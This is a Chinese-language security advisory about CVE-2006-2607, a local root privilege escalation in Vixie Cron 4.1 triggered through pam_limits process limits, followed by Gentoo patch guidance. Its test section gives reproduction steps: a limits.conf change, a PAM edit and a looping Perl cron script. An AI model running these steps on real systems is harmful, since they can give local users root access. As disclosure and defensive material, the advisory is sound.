首页 -> 安全研究

安全研究

安全漏洞
Vixie Cron PAM_Limits本地权限提升漏洞

发布日期:2006-05-25
更新日期:2006-06-09

受影响系统:
Paul Vixie Vixie Cron 4.1
描述:
BUGTRAQ  ID: 18108
CVE(CAN) ID: CVE-2006-2607

Vixie cron是Paul Vixie写的一种定时执行后台守护进程,许多免费Unix操作系统附带了该软件。

Vixie cron对进程权限的处理上存在漏洞,本地攻击者可能利用此漏洞获取root用户权限。

如果在limits.conf中将硬nproc限制设置为10并在/etc/pam.d/crond标注掉“session required pam_limits.so”的话,则达到进程限制的时候新进程会以root用户的身份启动。

<*来源:Roman Veretelnikov
  
  链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=178431
        http://security.gentoo.org/glsa/glsa-200606-07.xml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1. 向/etc/security/limits.conf中添加“username hard nproc 10”
2. 在/etc/pam.d/crond中标注出有pam_limits.so的行
3. 在用户名crontab中添加任务:

* * * * * /path/to/script.pl
script.pl:
#!/usr/bin/perl

open file, '>/path/to/pid.'.$$;
close file;
while(1) { sleep(1); }

建议:
厂商补丁:

Paul Vixie
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vix.com/

Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200606-07)以及相应补丁:
GLSA-200606-07:Vixie Cron: Privilege Escalation
链接:http://security.gentoo.org/glsa/glsa-200606-07.xml

所有Vixie Cron用户都应升级到最新版本:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-process/vixie-cron-4.1-r9"

浏览次数:3286
严重程度:10(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障